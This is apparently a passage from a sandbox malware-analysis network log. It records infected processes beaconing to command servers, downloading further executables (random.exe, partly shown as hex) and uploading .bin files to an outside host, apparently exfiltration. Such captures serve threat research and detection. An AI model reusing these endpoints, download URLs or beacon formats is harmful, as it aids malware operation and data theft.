Dec 22, 2024 02:17:31.900600910 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:33.197973013 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:32 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49997	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:34.720556021 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019808001&unit=246122658369
Dec 22, 2024 02:17:36.073352098 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50001	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:34.976023912 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:36.279072046 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:36 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50004	185.215.113.16	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:36.310417891 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 22, 2024 02:17:37.607482910 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:36 GMT Content-Type: application/octet-stream Content-Length: 1845760 Last-Modified: Sun, 22 Dec 2024 00:18:45 GMT Connection: keep-alive ETag: "67675ae5-1c2a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 10 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 49 00 00 04 00 00 f1 78 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gI@@Ix@T0h 1 H@.rsrc X@.idata 0Z@ *@\@ltyimmojP/^@vmbhrkovI@.taggant0I"@
Dec 22, 2024 02:17:37.607693911 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:37.607703924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:37.607712984 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:37.607723951 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:37.607734919 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: qr"6^n
Dec 22, 2024 02:17:37.607747078 CET	1236	IN	Data Raw: ee 50 9b ed 04 17 da 40 2d c1 96 59 12 00 eb 80 0e 8e af ee 97 55 05 08 fb a7 3c 7b 86 e5 0f d9 c5 7a 42 bb 05 58 76 aa 8b 7a 1a 6e c5 b0 5c c6 23 09 18 6f fe 6a 83 3e cc bd 03 41 3a 12 d2 71 4d ba 04 27 ea b6 af a2 d9 ee dd 8d 42 e4 fd af cc e9 Data Ascii: P@-YU<{zBXvzn\#oj>A:qM'B)2Z)DYAitC70PQ0}P=\ UNj+y?]}AnK?#"Z87xXi?3M!i'f)gIWl=Tun\|$0!
Dec 22, 2024 02:17:37.608118057 CET	1236	IN	Data Raw: 55 09 b3 52 24 12 75 2e ce 5f 19 0e 12 db bc 23 3d db 0d f5 79 cb 98 0c 8f f8 6a cc 88 d1 01 10 3e 2c 5d 8c 5a 3e f1 0c 89 db 6b db 8a 11 9c 88 1e 8e 89 3e 73 0e 43 6b 88 7e 6e aa 8b 1f 60 01 80 5b d4 19 f5 e0 cc b7 d4 ce 7f 7a de a0 1a 51 14 7d Data Ascii: UR$u._#=yj>,]Z>k>sCk~n`[zQ}AV^q3e!"x<;/iTaZk=Af\AU#V&?{.{<97zZZoV,8.j4'3p4U= 2]oV6+
Dec 22, 2024 02:17:37.608170033 CET	1236	IN	Data Raw: c2 ea 9f 3c 74 47 c9 75 21 1d 65 49 e9 63 7e 66 20 69 41 d0 23 4f c4 ba 95 32 10 20 7c 24 6a 8a 43 62 82 64 a4 68 57 2e c6 3c 40 28 ce 31 88 88 83 20 5b 4d 6b fe a2 0c fb f2 21 27 54 fd 2d 93 70 46 64 1c 2c 0e 8e 70 a3 e7 dc 4c 10 12 c6 c3 41 32 Data Ascii: <tGu!eIc~f iA#O2 \|$jCbdhW.<@(1 [Mk!'T-pFd,pLA23)Gg!L/T5CFWcEar]2AK^#i1zbg)?$hqZ-{'B71y_()UAZ
Dec 22, 2024 02:17:37.608182907 CET	1236	IN	Data Raw: d4 6d 12 d4 20 d6 8b 34 3c 9b 1a a1 04 1b 6e 22 bb 0f ac 26 0c ee 80 4c 7c af 1d 16 03 f5 1f 76 f9 f7 69 67 5b 28 5d 43 66 35 ed 85 ff f8 4a 7f da d8 14 78 16 2e 06 ce 6c 99 67 0e 20 fa fa b6 ad f2 13 36 8b 2b 10 37 5c 73 70 0c aa c7 18 8e 8d 23 Data Ascii: m 4<n"&L\|vig[(]Cf5Jx.lg 6+7\sp# ]M,o^~`3u,-_$hTi%x1Z`Co\|Fh&bp${1^9iBjN[-C)5Ztmssm\(^g1
Dec 22, 2024 02:17:37.727257013 CET	1236	IN	Data Raw: 25 5b 03 8d 32 24 02 86 06 d1 1b 89 72 02 61 9f c1 21 d4 12 0f 0e 96 f0 12 4d 13 10 fa 1b 9e e0 f4 31 cc 3d 3c b2 40 c2 a7 77 0c 31 cc 5a 21 0d 8d 74 f6 ee 9f 6f d5 66 71 46 7c c2 bd c5 79 0d c4 1a c5 63 d6 d9 54 6f da 7a cd 5f 3e 42 a3 33 cc 1e Data Ascii: %[2$ra!M1=<@w1Z!tofqF\|ycToz_>B3)rGc59iR4f=Dr,DqqlYAF\|Lfz/\J\fji2LqsD7?n0/1`F.xmOaq9&hubpP\.d(jg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50005	185.121.15.192	80	2648	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:37.258013964 CET	643	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5sb.top Accept: / Content-Length: 464 Content-Type: multipart/form-data; boundary=------------------------3Hmb0Xz54igKmXytiHgVfo Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 48 6d 62 30 58 7a 35 34 69 67 4b 6d 58 79 74 69 48 67 56 66 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 61 68 69 63 6f 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0b b3 05 ba 73 48 ad 01 6e bb fb e0 d9 b6 f5 c5 cd 81 ac 5b c2 9a 4a b9 ee dc 78 7b 01 2e cc 4a 24 16 4c 34 7e c8 8f 31 c6 5d 5e 59 25 bc f3 54 8c 89 be a4 19 75 f5 f4 a7 2c f9 34 2b e1 e4 8e 8e 0e ce ee b6 6f 2a 23 0a e1 56 45 8a 16 7a ed 43 e0 5a 3b 48 81 26 05 d1 3c ff ff db 00 24 04 07 67 ad 5f 57 c7 1b bb 86 e3 4c 83 88 5f 60 09 fa 09 17 39 a3 e9 eb 4e 21 01 be 17 45 e9 0d 70 84 a2 12 7c f7 96 31 9f 5c 1d 19 bb 79 c0 a5 08 f3 29 6a aa d4 e8 d7 42 cf f7 ab a4 7e 69 34 d0 60 8c 14 21 af 98 eb 63 37 92 13 26 2a 81 10 05 [TRUNCATED] Data Ascii: --------------------------3Hmb0Xz54igKmXytiHgVfoContent-Disposition: form-data; name="file"; filename="Zahicoha.bin"Content-Type: application/octet-streamsHn[Jx{.J$L4~1]^Y%Tu,4+o#VEzCZ;H&<$g_WL_`9N!Ep\|1\y)jB~i4`!c7&g&K,7Pf`x8!xqJIrA-?j--------------------------3Hmb0Xz54igKmXytiHgVfo--
Dec 22, 2024 02:17:38.683259964 CET	274	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 22 Dec 2024 01:17:38 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-RateLimit-Limit: 30 X-RateLimit-Remaining: 29 X-RateLimit-Reset: 1734832059 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50011	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:38.045597076 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:39.353915930 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:39 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50016	185.121.15.192	80	2648	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:40.294697046 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5sb.top Accept: / Content-Length: 63842 Content-Type: multipart/form-data; boundary=------------------------F6Kt4zmRl4u7Vp1IRRQ2Qm Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 36 4b 74 34 7a 6d 52 6c 34 75 37 56 70 31 49 52 52 51 32 51 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 65 64 61 62 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 11 09 f9 b5 66 22 f1 26 3a 44 bc 01 66 15 08 04 49 b6 cf 3b 1e 13 11 78 b4 c9 43 c6 6f fa cc d2 cc dc e0 4d 06 d5 b0 b2 7e ce eb 11 3c 66 b4 50 ab c6 fe ed 51 f1 1a 87 55 81 1d 74 24 07 85 6c a6 06 ff de cb 95 4a 8e 20 0f 4f 38 f9 3c ea 88 45 51 b5 53 49 49 42 7d 89 8d f3 8a 82 40 67 d4 c7 46 bb 89 52 22 06 08 2c 2f 27 fd 2d d1 cd 8d 4f 0c 28 ea e7 1f a3 e8 16 f0 9c 66 69 68 3b b6 23 ac 84 33 5d 7c 1d 72 f7 26 48 a3 90 37 05 c0 f7 32 3f 9d b0 db 0d a9 58 c0 3a f7 e1 df 60 1a 25 1f 81 e3 14 98 ec 74 19 9b ef 5d db de 38 95 ef [TRUNCATED] Data Ascii: --------------------------F6Kt4zmRl4u7Vp1IRRQ2QmContent-Disposition: form-data; name="file"; filename="Nedabo.bin"Content-Type: application/octet-stream/f"&:DfI;xCoM~<fPQUt$lJ O8<EQSIIB}@gFR",/'-O(fih;#3]\|r&H72?X:`%t]8okNU?\|0wkDTUl,KC?^[\|@d$b8[mqBOf&%&3Y "qM]/htjnddRmBJh2/LJX1M>Jl@l$)Zrnh{6[=eF0+pG3P+L'M?Fh!CRl\hq'E1$=WE\|f,(LuAu\|yb7v,$^h`HI`T=V6+DV]8-#TY{^+;h2T):c)d5CEZEGh;l+?[n2021V#7Nj-'k[kUCK,qxMH!;^!0aeXw"SKLzc\|}\K\|/kY\|41 ,J*[dn5I'F6D7T<3>'x`S<vO^S [TRUNCATED]
Dec 22, 2024 02:17:40.414352894 CET	2472	OUT	Data Raw: f1 3c 0a 6a 44 e2 e2 ff 4a 7d a7 be aa 5b 26 4f 59 d2 e5 4e 66 ed f1 e7 f0 18 12 11 a9 a0 36 4d c3 a3 0b 3d 82 f5 43 24 ec c6 bd 06 47 bc 0d 6a 7a a8 8b b1 ef f1 73 17 b4 58 51 0d 0e 04 88 59 ef bb e1 e7 23 cf 7d 88 8a 0c 08 c3 b9 71 bf 79 05 f1 Data Ascii: <jDJ}[&OYNf6M=C$GjzsXQY#}qykP&mZvtdT`p'<?e=6R4<5773@H`r+eg'\2<5`k%}zL>4$e}fS\$D!K.YXwsVB~)}gDmbVVG
Dec 22, 2024 02:17:40.414402962 CET	2472	OUT	Data Raw: c3 b5 69 30 35 f1 c8 ba 86 04 91 95 b9 e4 47 78 eb 23 72 aa b5 5d 18 68 aa 3b df 89 5a c2 55 6b 0f dd 25 f9 bc c5 5d d0 fe 80 ea 5f 5a 41 8a f3 c2 6c 84 ab f8 f9 60 16 18 df bb d2 1e 6e 17 8b 82 06 f1 f9 6d 15 a2 72 50 6e 2e c4 c2 d3 1c 36 83 d4 Data Ascii: i05Gx#r]h;ZUk%]_ZAl`nmrPn.6pKQ;)?u.,:0q_~Sb7ZK~a i ]#)b<c3Dc~>% !w+oUPQ~i<(6ioy\7rXSg
Dec 22, 2024 02:17:40.414460897 CET	2472	OUT	Data Raw: b5 08 29 fc ef 93 a7 de 9c 05 ae 67 1b b8 5c 9b 78 50 02 3d 06 b5 b9 c6 a5 10 34 53 be 21 b8 e8 31 57 40 ec 9b d1 cf b4 cc d1 e6 fe 23 40 49 25 f4 e0 b2 70 d3 f7 80 be 4d 4d f9 d3 4d a3 d4 cf 0e a7 aa 8d 96 20 70 e2 5c 8b 14 d3 e1 51 52 10 3f ee Data Ascii: )g\xP=4S!1W@#@I%pMMM p\QR?hNDuxF\|gr+)Pj@);Qi`ymq'-_YWIFOy9v<8+J+_/#3+]$^3gS`/]Bs
Dec 22, 2024 02:17:40.414495945 CET	2472	OUT	Data Raw: 00 d3 c2 5c 33 b9 77 40 16 f9 e1 66 a4 32 b0 40 d1 f5 0c 72 6f 06 e0 89 57 ae f1 50 e9 d1 5a eb d0 8a 68 ec f5 f8 94 b5 21 78 ff d0 3b 71 b4 41 ce 13 d9 84 d7 21 34 14 b0 b0 6f 3e 3c 2a 45 0b 99 9b aa af 18 52 8f 48 08 ce d0 66 fa df 5e d7 be 9a Data Ascii: \3w@f2@roWPZh!x;qA!4o><*ERHf^h=CKD3SNp{lvC0U75E'5+EqtzU,1"+x]7)\qv!@'P!+pZ{++;ukS'4EM8G
Dec 22, 2024 02:17:40.414565086 CET	4944	OUT	Data Raw: e5 ad 24 f0 17 44 99 fb 10 11 34 8a 1f ad cf ab 53 01 37 f2 28 d0 da 41 7f 44 55 2f 0b 58 a3 37 e0 44 83 85 5b 5a c5 62 24 7d 20 27 26 d1 ac 48 52 99 42 e5 64 92 1d 10 5b 6f a5 c4 07 d6 a1 ad 49 6c 72 03 7d c5 26 ac ec 65 8f 47 1c 78 81 e1 1b aa Data Ascii: $D4S7(ADU/X7D[Zb$} '&HRBd[oIlr}&eGx,`e~>[cX.i*tzn\.X.4i{DFzmXN"Mggl9YT<40Ht^{[}\8hTh4sz~+cOxZ_
Dec 22, 2024 02:17:40.414659023 CET	4944	OUT	Data Raw: e4 1c 3e 48 c6 cb 0c ea 09 f8 5c 22 7d d6 fa bc bb 2a 1b fe 82 32 4b ef 1e aa 32 32 57 92 e5 1a 27 41 87 ca 9a 90 9b bd f0 79 23 7b 6f 73 08 95 61 27 31 11 36 99 05 97 e7 97 3c 0c 14 62 aa 88 b7 56 2a b0 eb de 2a 1c bc 42 fd db cc 49 50 b8 03 a6 Data Ascii: >H\"}2K22W'Ay#{osa'16<bVBIP%[M>@VARVF\|rP!BV JB^Z/C%A432t6POr1<;0.`YAs~\|TGvt;138{/J%SS\|!G[hp_#{I{$
Dec 22, 2024 02:17:40.414746046 CET	4944	OUT	Data Raw: c9 cf 31 0f 2a 76 7f 38 15 ba af e3 39 b9 69 2a e1 e2 86 b9 a3 1a cb 9d 93 75 63 85 96 6b 76 08 74 08 b4 24 93 d0 29 4b 13 93 ee 38 18 b6 38 7e 01 1d 07 18 c3 62 fd 52 dc 89 66 b5 35 29 0d 08 e7 89 bb ca aa 8c 78 c6 15 32 fb a0 73 fb ed 2c c4 2e Data Ascii: 1v89iuckvt$)K88~bRf5)x2s,.14iFv8leZYEl'n-9+8xGIOKUcz+]>S <o!G.j=Y`_=d=G=7tUPi $j0y1DOHmIPq
Dec 22, 2024 02:17:40.534012079 CET	2472	OUT	Data Raw: 48 b9 86 bb d2 d1 c5 f7 02 97 70 5b 9c 67 33 db 5a b5 0b a5 ab b6 55 f8 10 ce 9e 2f 18 45 71 5a 1d 47 85 26 86 aa 42 7d d9 b1 a6 cb 6d f4 5f 7e 87 bf da 11 c9 66 bb 2c 9d 23 f3 d8 96 5b 86 d5 e0 4b 9f 37 52 43 b7 67 a4 88 87 85 b5 fa 37 1d 69 3e Data Ascii: Hp[g3ZU/EqZG&B}m_~f,#[K7RCg7i>LD 8g1/_W=^IL\}+L@v6SXB0BAGt-3#%A[\rz%`?e?UwdcVg-u""X817FhxF8
Dec 22, 2024 02:17:40.534066916 CET	2472	OUT	Data Raw: e5 2f f7 f4 23 97 a3 99 2a fe 64 95 c6 f6 53 7c b5 e2 b8 df 9a 57 a4 94 20 5e 63 b3 f8 7c c1 05 cc f2 49 ac 06 77 be f7 b6 5c e5 99 68 e4 af 14 70 f2 d1 ec b0 b6 84 13 ec e1 c0 18 cc 5b 75 a0 e8 ea ce 54 13 7e b1 40 ad 40 04 a8 0f 98 81 a7 54 69 Data Ascii: /#dS\|W ^c\|Iw\hp[uT~@@TikDA$kB^Rz(AcY;]WmwS\?k2k3)c@5Lj>UrkSm'3[}\hl\|aaX^0G8P``]9/-gb-
Dec 22, 2024 02:17:40.534173965 CET	4944	OUT	Data Raw: c1 aa 18 4c e7 ea d1 35 ad fa 80 b4 85 cf 5e 92 60 16 41 cf 0b d3 fe 83 1c b7 50 8e e3 99 16 af 81 18 c1 db 83 4a 1b e1 62 3c b8 d6 82 0b f3 dc 11 92 de 83 cb ff 33 9c 12 ed fa a6 07 d4 29 cc 48 25 42 7b a5 15 12 ba e5 9d bf a0 ae a2 66 06 23 d1 Data Ascii: L5^`APJb<3)H%B{f#$dL\9^bh53\|%bc-$C8G{`+{rI;:WKBQp$mq&p8o31ivZ6]ObnsN\|:Glai.*_RU
Dec 22, 2024 02:17:42.055047989 CET	274	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 22 Dec 2024 01:17:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-RateLimit-Limit: 30 X-RateLimit-Remaining: 28 X-RateLimit-Reset: 1734832059 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50018	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:41.404232979 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:42.713399887 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:42 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50024	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:43.329495907 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019809001&unit=246122658369
Dec 22, 2024 02:17:44.671525955 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50025	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:44.504565001 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:45.817074060 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:45 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50026	185.215.113.16	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:44.966159105 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
